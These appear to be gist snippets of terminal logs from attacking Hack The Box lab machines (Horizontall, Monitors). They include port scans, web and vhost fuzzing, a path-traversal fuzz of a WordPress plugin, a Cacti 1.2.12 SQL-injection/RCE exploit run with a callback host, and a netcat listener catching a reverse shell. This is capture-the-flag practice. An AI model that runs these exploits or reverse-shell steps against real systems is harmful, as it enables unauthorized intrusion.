This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo nmap 10.10.11.105 -sC -sV -oN nmap-tcp-full -p- --min-rate 10000 | |
| Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 20:43 IST | |
| Nmap scan report for 10.10.11.105 | |
| Host is up (0.21s latency). | |
| Not shown: 65533 closed ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | |
| | ssh-hostkey: | |
| | 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA) | |
| | 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ffuf -c -u http://horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -t 200 255 ⨯ | |
| /'___\ /'___\ /'___\ | |
| /\ \__/ /\ \__/ __ __ /\ \__/ | |
| \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ | |
| \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ | |
| \ \_\ \ \_\ \ \____/ \ \_\ | |
| \/_/ \/_/ \/___/ \/_/ | |
| v1.3.1 Kali Exclusive <3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 | |
| =============================================================== | |
| Gobuster v3.1.0 | |
| by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) | |
| =============================================================== | |
| [+] Url: http://horizontall.htb/ | |
| [+] Method: GET | |
| [+] Threads: 200 | |
| [+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | |
| [+] User Agent: gobuster/3.1.0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb/ -H "Host:FUZZ.horizontall.htb" --hl 1,7 | |
| /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
| ******************************************************** | |
| * Wfuzz 3.1.0 - The Web Fuzzer * | |
| ******************************************************** | |
| Target: http://horizontall.htb/ | |
| Total requests: 114441 | |
| ===================================================================== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ffuf -c -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 200 | |
| /'___\ /'___\ /'___\ | |
| /\ \__/ /\ \__/ __ __ /\ \__/ | |
| \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ | |
| \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ | |
| \ \_\ \ \_\ \ \____/ \ \_\ | |
| \/_/ \/_/ \/___/ \/_/ | |
| v1.3.1 Kali Exclusive <3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo nmap 10.10.10.238 -sC -sV -oN nmap-tcp-full -p- --min-rate 10000 | |
| Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-11 10:38 IST | |
| Nmap scan report for 10.10.10.238 | |
| Host is up (0.21s latency). | |
| Not shown: 65533 closed ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | |
| | ssh-hostkey: | |
| | 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA) | |
| | 256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ffuf -c -u http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../..//FUZZ -w file_inclusion_linux.txt -fw 1 -fs 0 -fl 1 | |
| /'___\ /'___\ /'___\ | |
| /\ \__/ /\ \__/ __ __ /\ \__/ | |
| \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ | |
| \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ | |
| \ \_\ \ \_\ \ \____/ \ \_\ | |
| \/_/ \/_/ \/___/ \/_/ | |
| v1.3.1 Kali Exclusive <3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| python3 49810.py -h 2 ⨯ | |
| usage: 49810.py [-h] -t <target/host URL> -u <user> -p <password> --lhost <lhost> --lport <lport> | |
| [*] Cacti 1.2.12 - SQL Injection / Remote Code Execution | |
| optional arguments: | |
| -h, --help show this help message and exit | |
| -t <target/host URL> target/host URL, example: http://192.168.15.58 | |
| -u <user> user to log in | |
| -p <password> user's password |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| python3 49810.py -t http://cacti-admin.monitors.htb -u admin -p <PASSWORD> --lhost 10.10.14.225 --lport 80 1 ⨯ | |
| [+] Connecting to the server... | |
| [+] Retrieving CSRF token... | |
| [+] Got CSRF token: sid:4bf2475c0b3d453783fc1f9665153e363feb84b5,1631343319 | |
| [+] Trying to log in... | |
| [+] Successfully logged in! | |
| [+] SQL Injection: | |
| "name","hex" | |
| "","" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo nc -lvnp 80 130 ⨯ | |
| Ncat: Version 7.91 ( https://nmap.org/ncat ) | |
| Ncat: Listening on :::80 | |
| Ncat: Listening on 0.0.0.0:80 | |
| Ncat: Connection from 10.10.10.238. | |
| Ncat: Connection from 10.10.10.238:40976. | |
| /bin/sh: 0: can't access tty; job control turned off | |
| $ id | |
| uid=33(www-data) gid=33(www-data) groups=33(www-data) |
OlderNewer